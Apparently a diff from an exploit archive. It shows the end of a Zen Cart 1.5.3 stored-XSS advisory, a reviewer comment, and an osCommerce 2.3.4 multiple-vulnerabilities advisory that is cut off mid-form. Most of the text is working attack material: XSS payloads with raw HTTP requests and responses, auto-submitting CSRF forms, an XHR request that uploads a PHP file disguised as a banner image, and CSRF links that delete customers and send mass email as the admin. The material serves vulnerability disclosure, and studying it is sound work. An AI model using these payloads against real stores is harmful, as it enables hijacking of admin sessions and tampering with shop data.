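+<script>alert(666)</script>
+</div>
+<div class="centerColumn" id="indexProductList">
+<h1 id="productListHeading"><script>alert(666)</script></h1>
+(...)
+- Extras -> Recording Artists -> Add
+Vulnerable parameter - artists_name
+Request:
+POST /zen/zen-cart-v1.5.3-07042014/admin123/record_artists.php?action=insert HTTP/1.1
+Host: localhost
+Content-Type: multipart/form-data; boundary=---------------------------14015448418946681711346093460
+Content-Length: 1099
+-----------------------------14015448418946681711346093460
+Content-Disposition: form-data; name="securityToken"
+84c8fe52eb9b3b0e026b5438e1c21f6f
+-----------------------------14015448418946681711346093460
+Content-Disposition: form-data; name="artists_name"
+<script>alert(666)</script>
+-----------------------------14015448418946681711346093460
+(Content-Disposition: form-data; name="artists_image"; filename=""
+Content-Type: application/octet-stream
+-----------------------------14015448418946681711346093460
+Content-Disposition: form-data; name="img_dir"
+-----------------------------14015448418946681711346093460
+Content-Disposition: form-data; name="artists_image_manual"
+-----------------------------14015448418946681711346093460
+Content-Disposition: form-data; name="artists_url[1]"
+-----------------------------14015448418946681711346093460
+Content-Disposition: form-data; name="x"
+39
+-----------------------------14015448418946681711346093460
+Content-Disposition: form-data; name="y"
+19
+-----------------------------14015448418946681711346093460--)
+Response:
+(...)
+<td class="dataTableContent"><script>alert(666)</script></td>
+<td class="dataTableContent" align="right">
+(...)
+<tr class="infoBoxHeading">
+<td class="infoBoxHeading"><b><script>alert(666)</script></b></td>
+</tr>
+(...)
+- Gift Certificate/Coupons -> Coupon admin -> Add
+Vulnerable parameters - coupon_name, coupon_desc, coupon_amount, coupon_min_order, coupon_code, coupon_uses_coupon, coupon_uses_user
+Request:
+POST /zen/zen-cart-v1.5.3-07042014/admin123/coupon_admin.php?action=update&oldaction=new&cid=0&page=0 HTTP/1.1
+Host: localhost
+securityToken=84c8fe52eb9b3b0e026b5438e1c21f6f&coupon_name%5B1%5D=%27%3E%22%3E%3C%3EXSSD&coupon_desc%5B1%5D=%27%3E%22%3E%3C%3EXSSD&coupon_amount=%27%3E%22%3E%3C%3EXSSD&coupon_min_order=%27%3E%22%3E%3C%3EXSSD&coupon_free_ship=on&coupon_code=%27%3E%22%3E%3C%3EXSSD&coupon_uses_coupon=%27%3E%22%3E%3C%3EXSSD&coupon_uses_user=%27%3E%22%3E%3C%3EXSSD&coupon_startdate_day=9&coupon_startdate_month=7&coupon_startdate_year=2014&coupon_finishdate_day=9&coupon_finishdate_month=7&coupon_finishdate_year=2015&coupon_zone_restriction=1&x=62&y=10
+Response:
+(...)
+<tr>
+<td align="left">Coupon Name</td>
+<td align="left">'>"><>XSSD</td>
+</tr>
+<tr>
+<td align="left">Coupon Description <br />(Customer can see)</td>
+<td align="left">'>"><>XSSD</td>
+</tr>
+<tr>
+<td align="left">Coupon Amount</td>
+<td align="left"></td>
+</tr>
+<tr>
+<td align="left">Coupon Minimum Order</td>
+<td align="left">'>"><>XSSD</td>
+</tr>
+<tr>
+<td align="left">Free Shipping</td>
+<td align="left">Free Shipping</td>
+</tr>
+<tr>
+<td align="left">Coupon Code</td>
+<td align="left">'>"><>XSSD</td>
+</tr>
+<tr>
+<td align="left">Uses per Coupon</td>
+<td align="left">'>"><>XSSD</td>
+</tr>
+<tr>
+<td align="left">Uses per Customer</td>
+<td align="left">'>"><>XSSD</td>
+</tr>
+(...)
+- Gift Certificate/Coupons -> Mail gift certificate -> Send
+Vulnerable parameter - email_to
+Request:
+POST /zen/zen-cart-v1.5.3-07042014/admin123/gv_mail.php?action=preview HTTP/1.1
+Host: localhost
+securityToken=84c8fe52eb9b3b0e026b5438e1c21f6f&customers_email_address=Active+customers+in+past+3+months+%28Subscribers%29&email_to=%27%3E%22%3E%3C%3EXSSED&from=szit%40szit.in&subject=asdf&amount=666&message=asdf&x=13&y=12
+Response:
+(...)
+</tr>
+<tr>
+<td class="smallText"><b>Customer:</b><br />'>"><>XSSED</td>
+</tr>
+<tr>
+(...)
+- Tools -> Banner manager -> Add
+Request:
+POST /zen/zen-cart-v1.5.3-07042014/admin123/banner_manager.php?page=1&action=add HTTP/1.1
+Host: localhost
+Content-Type: multipart/form-data; boundary=---------------------------3847719184268426731396009422
+Content-Length: 2317
+-----------------------------3847719184268426731396009422
+Content-Disposition: form-data; name="securityToken"
+84c8fe52eb9b3b0e026b5438e1c21f6f
+-----------------------------3847719184268426731396009422
+Content-Disposition: form-data; name="status"
+1
+-----------------------------3847719184268426731396009422
+Content-Disposition: form-data; name="banners_open_new_windows"
+0
+-----------------------------3847719184268426731396009422
+Content-Disposition: form-data; name="banners_on_ssl"
+1
+-----------------------------3847719184268426731396009422
+Content-Disposition: form-data; name="banners_title"
+'>"><>XSS
+-----------------------------3847719184268426731396009422
+Content-Disposition: form-data; name="banners_url"
+'>"><>XSS
+-----------------------------3847719184268426731396009422
+Content-Disposition: form-data; name="banners_group"
+BannersAll
+-----------------------------3847719184268426731396009422
+Content-Disposition: form-data; name="new_banners_group"
+'>"><>XSS
+-----------------------------3847719184268426731396009422
+Content-Disposition: form-data; name="banners_image"; filename=""
+Content-Type: application/octet-stream
+-----------------------------3847719184268426731396009422
+Content-Disposition: form-data; name="banners_image_local"
+-----------------------------3847719184268426731396009422
+Content-Disposition: form-data; name="banners_image_target"
+-----------------------------3847719184268426731396009422
+Content-Disposition: form-data; name="banners_html_text"
+'>"><>XSS
+-----------------------------3847719184268426731396009422
+Content-Disposition: form-data; name="banners_sort_order"
+15
+-----------------------------3847719184268426731396009422
+Content-Disposition: form-data; name="date_scheduled"
+-----------------------------3847719184268426731396009422
+Content-Disposition: form-data; name="expires_date"
+-----------------------------3847719184268426731396009422
+Content-Disposition: form-data; name="expires_impressions"
+0
+-----------------------------3847719184268426731396009422
+Content-Disposition: form-data; name="x"
+9
+-----------------------------3847719184268426731396009422
+Content-Disposition: form-data; name="y"
+7
+-----------------------------3847719184268426731396009422--
+Response:
+(...)
+<td class="dataTableContent"><a href="javascript:popupImageWindow('popup_image.php?banner=10')"><img src="images/icon_popup.gif" border="0" alt="View Banner" title=" View Banner "></a>&nbps;'>"><>XSS</td>
+<td class="dataTableContent" align="right">'>"><>XSS</td>
+<td class="dataTableContent" align="right">0 / 0</td>
+(...)
+<tr class="infoBoxHeading">
+<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
+</tr>
+(...)
+- Tools -> Newsletter and Product Notifications Manager -> New newsletter
+Request:
+POST /zen/zen-cart-v1.5.3-07042014/admin123/newsletters.php?action=insert HTTP/1.1
+Host: localhost
+securityToken=93867dff1d912bde757ce2bc0ac94425&module=newsletter&title=%27%3E%22%3E%3C%3EXSS&message_html=%27%3E%22%3E%3C%3EXSS&content=%27%3E%22%3E%3C%3EXSS&x=32&y=8
+Response:
+(...)
+<td class="dataTableContent"><a href="http://localhost/zen/zen-cart-v1.5.3-07042014/admin123/newsletters.php?page=1&nID=1&action=preview"><img src="images/icons/preview.gif" border="0" alt="Preview" title=" Preview "></a>&nbps;'>"><>XSS</td>
+<td class="dataTableContent" align="right">18 bytes</td>
+(...)
+<table border="0" width="100%" cellspacing="0" cellpadding="2">
+<tr class="infoBoxHeading">
+<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
+</tr>
+(...)
+- Tools -> EZ-Pages -> New file
+Request:
+POST /zen/zen-cart-v1.5.3-07042014/admin123/ezpages.php?action=insert HTTP/1.1
+Host: localhost
+Content-Type: multipart/form-data; boundary=---------------------------134785397313015614741294511591
+Content-Length: 2253
+-----------------------------134785397313015614741294511591
+Content-Disposition: form-data; name="securityToken"
+c74a83cefbb5ffc1868dd4a390bd0880
+-----------------------------134785397313015614741294511591
+Content-Disposition: form-data; name="x"
+41
+-----------------------------134785397313015614741294511591
+Content-Disposition: form-data; name="y"
+17
+-----------------------------134785397313015614741294511591
+Content-Disposition: form-data; name="pages_title"
+'>"><>XSS
+-----------------------------134785397313015614741294511591
+Content-Disposition: form-data; name="page_open_new_window"
+0
+-----------------------------134785397313015614741294511591
+(...)
+-----------------------------134785397313015614741294511591
+Content-Disposition: form-data; name="pages_html_text"
+'>"><>XSS
+-----------------------------134785397313015614741294511591
+Content-Disposition: form-data; name="alt_url"
+-----------------------------134785397313015614741294511591
+Content-Disposition: form-data; name="alt_url_external"
+-----------------------------134785397313015614741294511591--
+Response:
+(...)
+<td class="dataTableContent" width="75px" align="right">&nbps;1</td>
+<td class="dataTableContent">&nbps;'>"><>XSS</td>
+(...)
+<tr class="infoBoxHeading">
+<td class="infoBoxHeading"><b>Title:&nbps;'>"><>XSS&nbps;|&nbps;Prev/Next Chapter:&nbps;0</b></td>
+</tr>
+(...)
+- Localization -> Currencies -> New currency
+Request:
+POST /zen/zen-cart-v1.5.3-07042014/admin123/currencies.php?page=1&action=insert HTTP/1.1
+Host: localhost
+securityToken=c74a83cefbb5ffc1868dd4a390bd0880&title=%27%3E%22%3E%3C%3EXSS&code=%27%3E%22%3E%3C%3EXSS&symbol_left=%27%3E%22%3E%3C%3EXSS&symbol_right=%27%3E%22%3E%3C%3EXSS&decimal_point=%27%3E%22%3E%3C%3EXSS&thousands_point=%27%3E%22%3E%3C%3EXSS&decimal_places=%27%3E%22%3E%3C%3EXSS&value=%27%3E%22%3E%3C%3EXSS&x=13&y=15
+Response:
+(...)
+<td class="dataTableContent">'>"><>XSS</td>
+<td class="dataTableContent">'>"</td>
+(...)
+<tr class="infoBoxHeading">
+<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
+</tr>
+(...)
+<tr>
+<td class="infoBoxContent"><br>Title: '>"><>XSS</td>
+</tr>
+<tr>
+<td class="infoBoxContent">Code: '>"</td>
+</tr>
+<tr>
+<td class="infoBoxContent"><br>Symbol Left: '>"><>XSS</td>
+</tr>
+<tr>
+<td class="infoBoxContent">Symbol Right: '>"><>XSS</td>
+</tr>
+(...)
+<tr>
+<td class="infoBoxContent"><br>Example Output:<br>$30.00 = '>"><>XSS0'>"><>XSS</td>
+</tr>
+</table>
+(...)
+<tr>
+<td class="infoBoxContent"><br>Example Output:<br>$30.00 = '>"><>XSS0'>"><>XSS</td>
+</tr>
+- Localization -> Languages -> New language
+Affects big part of admin panel.
+Request:
+POST /zen/zen-cart-v1.5.3-07042014/admin123/languages.php?action=insert HTTP/1.1
+Host: localhost
+securityToken=c74a83cefbb5ffc1868dd4a390bd0880&name=%27%3E%22%3E%3C%3EXSS&code=xs&image=icon.gif&directory=%27%3E%22%3E%3C%3EXSS&sort_order=%27%3E%22%3E%3C%3EXSS&x=40&y=20
+Response:
+(...)
+<td class="messageStackCaution"><img src="images/icons/warning.gif" border="0" alt="Warning" title=" Warning ">&nbps;MISSING LANGUAGE FILES OR DIRECTORIES ... '>"><>XSS '>"><>XSS</td>
+</tr>
+</table>
+(...)
+<td class="dataTableContent">'>"><>XSS</td>
+<td class="dataTableContent">xs</td>
+(...)
+<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
+</tr>
+(...)
+<tr>
+<td class="infoBoxContent"><br>Name: '>"><>XSS</td>
+</tr>
+<tr>
+<td class="infoBoxContent">Code: xs</td>
+</tr>
+<tr>
+<td class="infoBoxContent"><br><img src="http://localhost/zen/zen-cart-v1.5.3-07042014/includes/languages/'>"><>XSS/images/icon.gif" border="0" alt="'>"><>XSS" title=" '>"><>XSS "></td>
+</tr>
+<tr>
+<td class="infoBoxContent"><br>Directory:<br>http://localhost/zen/zen-cart-v1.5.3-07042014/includes/languages/<b>'>"><>XSS</b></td>
+</tr>
+(...)
+Further injection:
+http://localhost/zen/zen-cart-v1.5.3-07042014/admin123/orders_status.php
+- Localization -> Orders status -> Insert
+Request:
+POST /zen/zen-cart-v1.5.3-07042014/admin123/orders_status.php?page=1&action=insert HTTP/1.1
+Host: localhost
+securityToken=c74a83cefbb5ffc1868dd4a390bd0880&orders_status_name%5B2%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B1%5D=%27%3E%22%3E%3C%3EXSS&x=9&y=7
+Response:
+(...)
+<tr id="defaultSelected" class="dataTableRowSelected" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost/zen/zen-cart-v1.5.3-07042014/admin123/orders_status.php?page=1&oID=5&action=edit'">
+<td class="dataTableContent">'>"><>XSS</td>
+<td class="dataTableContent" align="right"><img src="images/icon_arrow_right.gif" border="0" alt="">&nbps;</td>
+(...)
+- Locations / Taxes -> Zones -> New zone
+Request:
+POST /zen/zen-cart-v1.5.3-07042014/admin123/zones.php?page=1&action=insert HTTP/1.1
+Host: localhost
+securityToken=c74a83cefbb5ffc1868dd4a390bd0880&zone_name=%27%3E%22%3E%3C%3EXSS&zone_code=%27%3E%22%3E%3C%3EXSS&zone_country_id=247&x=17&y=11
+Response:
+(...)
+<td class="dataTableContent">'>"><>XSS</td>
+<td class="dataTableContent">'>"><>XSS</td>
+<td class="dataTableContent" align="center">'>"><>XSS</td>
+(...)
+<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
+</tr>
+</table>
+(...)
+<tr>
+<td class="infoBoxContent"><br>Zones Name:<br>'>"><>XSS ('>"><>XSS)</td>
+</tr>
+<tr>
+<td class="infoBoxContent"><br>Country: '>"><>XSS</td>
+- - Locations / Taxes -> Zone definitions -> Insert
+Request:
+POST /zen/zen-cart-v1.5.3-07042014/admin123/geo_zones.php?zpage=1&zID=1&action=insert_zone HTTP/1.1
+Host: localhost
+securityToken=c74a83cefbb5ffc1868dd4a390bd0880&geo_zone_name=%27%3E%22%3E%3C%3EXSS&geo_zone_description=%27%3E%22%3E%3C%3EXSS&x=25&y=13
+Response:
+(...)
+</a>&nbps;'>"><>XSS</td>
+<td class="dataTableContent">'>"><>XSS</td>
+(...)
+<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
+(...)
+<td class="infoBoxContent"><br>Description:<br>'>"><>XSS</td>
+- Locations / Taxes -> Tax Classes -> New tax class
+Request:
+POST /zen/zen-cart-v1.5.3-07042014/admin123/tax_classes.php?page=1&action=insert HTTP/1.1
+Host: localhost
+securityToken=c74a83cefbb5ffc1868dd4a390bd0880&tax_class_title=%27%3E%22%3E%3C%3EXSS&tax_class_description=%27%3E%22%3E%3C%3EXSS&x=33&y=9
+Response:
+(...)
+<td class="dataTableContent">'>"><>XSS</td>
+(...)
+<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
+(...)
+<td class="infoBoxContent"><br>Description:<br>'>"><>XSS</td>
+(...)
+- - Locations / Taxes -> Tax Rates -> New tax rate
+Request:
+POST /zen/zen-cart-v1.5.3-07042014/admin123/tax_rates.php?page=1&action=insert HTTP/1.1
+Host: localhost
+securityToken=c74a83cefbb5ffc1868dd4a390bd0880&tax_class_id=2&tax_zone_id=2&tax_rate=66&tax_description=%27%3E%22%3E%3C%3EXSS&tax_priority=&x=32&y=16
+Response:
+(...)
+<td class="dataTableContent">'>"><>XSS</td>
+<td class="dataTableContent">'>"><>XSS</td>
+<td class="dataTableContent">66%</td>
+<td class="dataTableContent">'>"><>XSS</td>
+(...)
+<tr class="infoBoxHeading">
+<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
+</tr>
+(...)
+<td class="infoBoxContent"><br>Description:<br>'>"><>XSS</td>
+(...)
+- Customers -> Group Pricing -> Insert
+Request:
+POST /zen/zen-cart-v1.5.3-07042014/admin123/group_pricing.php?action=insert HTTP/1.1
+Host: localhost
+securityToken=c74a83cefbb5ffc1868dd4a390bd0880&group_name=%27%3E%22%3E%3C%3EXSS&group_percentage=%27%3E%22%3E%3C%3EXSS&x=10&y=9
+Response:
+(...)
+<td class="dataTableContent">1</td>
+<td class="dataTableContent">'>"><>XSS</td>
+<td class="dataTableContent">0.00</td>
+(...)
+<tr class="infoBoxHeading">
+<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
+</tr>
+(...)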
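Review bot: `Vulnerable parameters - type_name & type_exit` does not match the request below it, which submits `type_ext`; the parameter name should be corrected so the affected field can be located in the source. `Vulenrable parameter - music_genre_name` has a typo, and the "Record companies" entry is the only one without a "Vulnerable parameter" line, even though its request also carries a `/etc/passwd` value in `record_company_image_manual` whose effect is never discussed — either document what was observed or drop the unrelated value from the PoC. The second "Further vuln" block (under Record companies) repeats the `music_genre_id=1` URL and response from the Music genre entry verbatim, so it is unclear whether the record-company name actually reaches the storefront or whether this was a copy-paste; if the former, the URL presumably needs the record-company filter. The "not a serious threat" remark under `#2` would read better with the standard qualification that stored XSS in an admin context is still worth fixing with output encoding, since the affected pages are rendered for every administrator.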

664
platforms/php/webapps/34582.txt Executable file

@ -0,0 +1,664 @@
#Title: osCommerce 2.3.4 - Multiple vulnerabilities
#Date: 10.07.14
#Affected versions: => 2.3.4 (latest atm)
#Vendor: oscommerce.com
#Tested on: Apache 2.2.22 [at] Debian
#Contact: smash [at] devilteam.pl
#Cross Site Scripting
1. Reflected XSS -> Send Email
Vulnerable parameters - customers_email_address & mail_sent_to
a) POST
Request:
POST /osc/oscommerce-2.3.4/catalog/admin/mail.php?action=preview HTTP/1.1
Host: localhost
customers_email_address=<script>alert(666)</script>&from=fuck@shit.up&subject=test&message=test
Response:
HTTP/1.1 200 OK
(...)
<td class="smallText"><strong>Customer:</strong><br /><script>alert(666)</script></td>
</tr>
(...)
CSRF PoC:
<html>
<body>
<form action="http://localhost/osc/oscommerce-2.3.4/catalog/admin/mail.php?action=preview" method="POST">
<input type="hidden" name="customers_email_address" value="<script>alert(666)</script>" />
<input type="hidden" name="from" value="fuck@shit.up" />
<input type="hidden" name="subject" value="test" />
<input type="hidden" name="message" value="test" />
<input type="submit" value="Go" />
</form>
</body>
</html>
b) GET
Request:
GET /osc/oscommerce-2.3.4/catalog/admin/mail.php?mail_sent_to=%3Cscript%3Ealert(666)%3C/script%3E HTTP/1.1
Host: localhost
Response:
(...)
<td class="messageStackSuccess"><img src="images/icons/success.gif" border="0" alt="Success" title="Success" />&nbps;Notice: Email sent to: <script>alert(666)</script></td>
</tr>
(...)
2. Persistent XSS via CSRF -> Newsletter
Request:
POST /osc/oscommerce-2.3.4/catalog/admin/newsletters.php?action=insert HTTP/1.1
Host: localhost
module=newsletter&title=<script>alert(123)</script>&content=<script>alert(456)</script>
CSRF PoC:
<html>
<body>
<form action="http://localhost/osc/oscommerce-2.3.4/catalog/admin/newsletters.php?action=insert" method="POST">
<input type="hidden" name="module" value="newsletter" />
<input type="hidden" name="title" value="<script>alert(123)</script>" />
<input type="hidden" name="content" value="<script>alert(456)</script>" />
<input type="submit" value="Go" />
</form>
</body>
</html>
First popbox (123) will be executed whenever someone will visit newsletters page:
localhost/osc/oscommerce-2.3.4/catalog/admin/newsletters.php
(...)
<td class="dataTableContent"><a href="http://localhost/osc/oscommerce-2.3.4/catalog/admin/newsletters.php?page=1&nID=2&action=preview"><img src="images/icons/preview.gif" border="0" alt="Preview" title="Preview" /></a>&nbps;<script>alert(123)</script></td>
(...)
<tr class="infoBoxHeading">
<td class="infoBoxHeading"><strong><script>alert(123)</script></strong></td>
</tr>
(...)
Second one, will be executed whenever someone will visit specific newsletter page:
localhost/osc/oscommerce-2.3.4/catalog/admin/newsletters.php?page=1&nID=1&action=preview
(...)
<tr>
<td><tt><script>alert(456)</script></tt></td>
</tr>
<tr>
(...)
3. Persistent XSS via CSRF -> Banner manager
Vulnerable parameter - banners_title
PoC:
<html>
<body>
<script>
function go()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://localhost/osc/oscommerce-2.3.4/catalog/admin/banner_manager.php?action=insert", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------19390593192018454503847724432");
xhr.withCredentials = true;
var body = "-----------------------------19390593192018454503847724432\r\n" +
"Content-Disposition: form-data; name=\"banners_title\"\r\n" +
"\r\n" +
"\x3cscript\x3ealert(666)\x3c/script\x3e\r\n" +
"-----------------------------19390593192018454503847724432\r\n" +
"Content-Disposition: form-data; name=\"banners_url\"\r\n" +
"\r\n" +
"url\r\n" +
"-----------------------------19390593192018454503847724432\r\n" +
"Content-Disposition: form-data; name=\"banners_group\"\r\n" +
"\r\n" +
"footer\r\n" +
"-----------------------------19390593192018454503847724432\r\n" +
"Content-Disposition: form-data; name=\"new_banners_group\"\r\n" +
"\r\n" +
"group\r\n" +
"-----------------------------19390593192018454503847724432\r\n" +
"Content-Disposition: form-data; name=\"banners_image\"; filename=\"info.gif\"\r\n" +
"Content-Type: application/x-php\r\n" +
"\r\n" +
"\x3c?php\n" +
"phpinfo();\n" +
"?\x3e\n" +
"\r\n" +
"-----------------------------19390593192018454503847724432\r\n" +
"Content-Disposition: form-data; name=\"banners_image_local\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------19390593192018454503847724432\r\n" +
"Content-Disposition: form-data; name=\"banners_image_target\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------19390593192018454503847724432\r\n" +
"Content-Disposition: form-data; name=\"banners_html_text\"\r\n" +
"\r\n" +
"sup\r\n" +
"-----------------------------19390593192018454503847724432\r\n" +
"Content-Disposition: form-data; name=\"date_scheduled\"\r\n" +
"\r\n" +
"2014-07-01\r\n" +
"-----------------------------19390593192018454503847724432\r\n" +
"Content-Disposition: form-data; name=\"expires_date\"\r\n" +
"\r\n" +
"2014-07-31\r\n" +
"-----------------------------19390593192018454503847724432\r\n" +
"Content-Disposition: form-data; name=\"expires_impressions\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------19390593192018454503847724432--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Go" onclick="go();" />
</form>
</body>
</html>
JS will be executed whenever someone will visitd banner manager page or specific banner page.
localhost/osc/oscommerce-2.3.4/catalog/admin/banner_manager.php
localhost/osc/oscommerce-2.3.4/catalog/admin/banner_manager.php?page=1&bID=[ID]
Response:
<td class="dataTableContent"><a href="javascript:popupImageWindow('popup_image.php?banner=3')"><img src="images/icon_popup.gif" border="0" alt="View Banner" title="View Banner" /></a>&nbps;<script>alert(666)</script></td>
<td class="dataTableContent" align="right">group</td>
4. Persistent XSS via CSRF -> Locations / Taxes
Countries tab is taken as example, but same vulnerability affects other tabs in 'Locations / Taxes', namely Tax Classes, Tax Rates, Tax Zones and Zones.
PoC:
<html>
<body>
<form action="http://localhost/osc/oscommerce-2.3.4/catalog/admin/countries.php?page=1&action=insert" method="POST">
<input type="hidden" name="countries_name" value="AAAA<script>alert(666)</script>" />
<input type="hidden" name="countries_iso_code_2" value="xs" />
<input type="hidden" name="countries_iso_code_3" value="sed" />
<input type="hidden" name="address_format_id" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
JS will be executed whenever someone will visitd 'countries' tab:
localhost/osc/oscommerce-2.3.4/catalog/admin/countries.php
Response:
(...)
<tr id="defaultSelected" class="dataTableRowSelected" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost/osc/oscommerce-2.3.4/catalog/admin/countries.php?page=1&cID=241&action=edit'">
<td class="dataTableContent">AAAA<script>alert(666)</script></td>
<td class="dataTableContent" align="center" width="40">xs</td>
<td class="dataTableContent" align="center" width="40">sed</td>
(...)
5. Persistent XSS via CSRF -> Localization
a) Currencies
PoC:
<html>
<body>
<form action="http://localhost/osc/oscommerce-2.3.4/catalog/admin/currencies.php?page=1&action=insert" method="POST">
<input type="hidden" name="cs" value="" />
<input type="hidden" name="title" value="<script>alert(666)</script>" />
<input type="hidden" name="code" value="666" />
<input type="hidden" name="symbol_left" value="hm" />
<input type="hidden" name="symbol_right" value="mh" />
<input type="hidden" name="decimal_point" value="10" />
<input type="hidden" name="thousands_point" value="100" />
<input type="hidden" name="decimal_places" value="10000" />
<input type="hidden" name="value" value="666"><script>alert(123)</script>" />
<input type="hidden" name="default" value="on" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
JS will be executed whenever someone will visit currencies tab:
localhost/osc/oscommerce-2.3.4/catalog/admin/currencies.php
Response:
(...)
<tr id="defaultSelected" class="dataTableRowSelected" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost/osc/oscommerce-2.3.4/catalog/admin/currencies.php?page=1&cID=3&action=edit'">
<td class="dataTableContent"><strong><script>alert(666)</script> (default)</strong></td>
<td class="dataTableContent">666</td>
<td class="dataTableContent" align="right">666.00000000</td>
(...)
b) Languages
PoC:
<html>
<body>
<form action="http://localhost/osc/oscommerce-2.3.4/catalog/admin/languages.php?action=insert" method="POST">
<input type="hidden" name="name" value=""><script>alert(666)</script>" />
<input type="hidden" name="code" value="h3ll" />
<input type="hidden" name="image" value="icon.gif" />
<input type="hidden" name="directory" value="asdf" />
<input type="hidden" name="sort_order" value="asdf" />
<input type="hidden" name="default" value="on" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
JS will be executed whenever someone will visit langauges tab:
localhost/osc/oscommerce-2.3.4/catalog/admin/languages.php
Response:
(...)
<tr id="defaultSelected" class="dataTableRowSelected" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost/osc/oscommerce-2.3.4/catalog/admin/languages.php?page=1&lID=2&action=edit'">
<td class="dataTableContent"><script>alert(666)</script></td>
<td class="dataTableContent">66</td>
(...)
c) Orders status
Request:
POST /osc/oscommerce-2.3.4/catalog/admin/orders_status.php?page=1&action=insert HTTP/1.1
Host: localhost
orders_status_name%5B2%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B3%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B4%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B5%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B6%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B7%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B1%5D=%27%3E%22%3E%3C%3EXSS
Response:
(...)
<td class="dataTableContent">'>"><>XSS</td>
(...)
<td class="infoBoxHeading"><strong>'>"><>XSS</strong></td>
(...)
<td class="infoBoxContent"><br /><img src="http://localhost/osc/oscommerce-2.3.4/catalog/includes/languages/asdf/images/icon.gif" border="0" alt="<script>alert(666)</script>" title="<script>alert(666)</script>" />&nbps;'>"><>XSS<br /><img src="http://localhost/osc/oscommerce-2.3.4/catalog/includes/languages/asdf/images/icon.gif" border="0" alt=""><script>alert(666)</script>" title=""><script>alert(666)</script>" />&nbps;'>"><>XSS<br /><img src="http://localhost/osc/oscommerce-2.3.4/catalog/includes/languages/asdf'>"><>XSS/images/icon.gif'>"><>XSS" border="0" alt=""><script>alert(666)</script>" title=""><script>alert(666)</script>" />&nbps;'>"><>XSS<br /><img src="http://localhost/osc/oscommerce-2.3.4/catalog/includes/languages/asdf/images/icon.gif'>"><>XSS" border="0" alt=""><script>alert(666)</script>" title=""><script>alert(666)</script>" />&nbps;'>"><>XSS<br /><img src="http://localhost/osc/oscommerce-2.3.4/catalog/includes/languages/asdf/images/icon.gif" border="0" alt=""><script>alert(666)</script>" title=""><script>alert(666)</script>" />&nbps;'>"><>XSS<br /><img src="http://localhost/osc/oscommerce-2.3.4/catalog/includes/languages/asdf/images/icon.gif'>"><>XSS" border="0" alt=""><script>alert(666)</script>" title=""><script>alert(666)</script>" />&nbps;'>"><>XSS<br /><img src="http://localhost/osc/oscommerce-2.3.4/catalog/includes/languages/english/images/icon.gif" border="0" alt="English" title="English" />&nbps;'>"><>XSS</td>
</tr>
#Boring CSRF
- Remove any item from cart
localhost/osc/oscommerce-2.3.4/catalog/shopping_cart.php?products_id=[ID]&action=remove_product
- Add item to cart
localhost/osc/oscommerce-2.3.4/catalog/product_info.php?products_id=[ID]&action=add_product
- Remove address book entry
localhost/osc/oscommerce-2.3.4/catalog/address_book_process.php?delete=1
- Remove specific country
localhost/osc/oscommerce-2.3.4/catalog/admin/countries.php?page=1&cID=1&action=deleteconfirm
- Remove specific currency
localhost/osc/oscommerce-2.3.4/catalog/admin/currencies.php?page=1&cID=[ID]&action=deleteconfirm
- Change store credentials
I'm to bored to craft another request's, whole 'Configuration' & 'Catalog' panel suffers on CSRF.
localhost/osc/oscommerce-2.3.4/catalog/admin/configuration.php
...and a lot more.
#Less boring CSRF
- Send email as admin -> Send email
It is able to send email to specific user, newsletter subscribers and all of them. In this case, '***' stands for sending mail to all customers.
<html>
<body>
<form action="http://localhost/osc/oscommerce-2.3.4/catalog/admin/mail.php?action=send_email_to_user" method="POST">
<input type="hidden" name="customers_email_address" value="***" />
<input type="hidden" name="from" value=""storeowner" <storemail@lol.lo>" />
<input type="hidden" name="subject" value="subject" />
<input type="hidden" name="message" value="sup" />
<input type="submit" value="Go" />
</form>
</body>
</html>
- Delete / Edit specific user
Remove user PoC:
localhost/osc/oscommerce-2.3.4/catalog/admin/customers.php?page=1&cID=1&action=deleteconfirm
Edit user PoC:
<html>
<body>
<form action="http://localhost/osc/oscommerce-2.3.4/catalog/admin/customers.php?page=1&cID=1&action=update" method="POST">
<input type="hidden" name="default_address_id" value="1" />
<input type="hidden" name="customers_gender" value="m" />
<input type="hidden" name="customers_firstname" value="juster" />
<input type="hidden" name="customers_lastname" value="testing" />
<input type="hidden" name="customers_dob" value="07/13/2004" />
<input type="hidden" name="customers_email_address" value="szit@szit.szit" />
<input type="hidden" name="entry_company" value="asdf" />
<input type="hidden" name="entry_street_address" value="asdfasdf" />
<input type="hidden" name="entry_suburb" value="asdfsdff" />
<input type="hidden" name="entry_postcode" value="66-666" />
<input type="hidden" name="entry_city" value="asdfasdf" />
<input type="hidden" name="entry_state" value="asdfasdfasdf" />
